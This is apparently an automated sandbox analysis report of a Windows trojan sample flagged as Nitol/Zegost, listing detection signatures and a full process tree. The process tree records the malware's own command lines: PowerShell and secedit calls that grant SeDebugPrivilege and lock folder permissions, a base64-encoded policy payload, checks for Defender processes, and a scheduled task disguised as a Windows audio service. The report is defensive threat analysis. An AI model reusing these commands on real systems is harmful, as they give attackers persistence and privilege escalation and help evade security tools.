Edit tour

Windows Analysis Report
Whyet-4.9.exe

Overview

General Information

Sample name:	Whyet-4.9.exe
Analysis ID:	1582017
MD5:	f317c17035501aaad0abfaf9fba4c085
SHA1:	f522fec1296c065cd4c3eaf52d1c4fbc26fd9f28
SHA256:	38622c32cac325c68f2fbf7148255a9813e7caeb53e3b95ebea56a6da5cb22ba
Tags:	exeuser-aachum
Infos:

Detection

Nitol, Zegost

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

Yara detected Zegost

AI detected suspicious sample

Contains functionality to capture and log keystrokes

Contains functionality to modify Windows User Account Control (UAC) settings

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Encrypted powershell cmdline option found

Found evasive API chain (may stop execution after checking mutex)

Found stalling execution ending in API Sleep call

Found suspicious powershell code related to unpacking or dynamic code loading

Machine Learning detection for dropped file

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious Program Location with Network Connections

Suspicious powershell command line found

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Too many similar processes found

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

Whyet-4.9.exe (PID: 4400 cmdline: "C:\Users\user\Desktop\Whyet-4.9.exe" MD5: F317C17035501AAAD0ABFAF9FBA4C085)

irsetup.exe (PID: 5800 cmdline: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5655410 "__IRAFN:C:\Users\user\Desktop\Whyet-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003" MD5: 2A7D5F8D3FB4AB753B226FD88D31453B)

powershell.exe (PID: 6076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=5800').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;} MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5064 cmdline: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LxN_oT.exe (PID: 4072 cmdline: "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe" MD5: C4C5317AC1AB7077C53DB6D82B2A119F)

powershell.exe (PID: 1532 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 5968 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 5456 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 2696 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 4956 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 2220 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 1196 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 6420 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

cmd.exe (PID: 6132 cmdline: cmd /c echo.>c:\inst.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7184 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7324 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

powershell.exe (PID: 7196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5252 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 3720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1256 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1252 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 1172 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

iusb3mon.exe (PID: 3680 cmdline: C:\ProgramData\program\iusb3mon.exe MD5: C4C5317AC1AB7077C53DB6D82B2A119F)

powershell.exe (PID: 7700 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 8088 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 7708 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 8096 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

powershell.exe (PID: 7724 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecEdit.exe (PID: 8072 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)

cmd.exe (PID: 7184 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7300 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

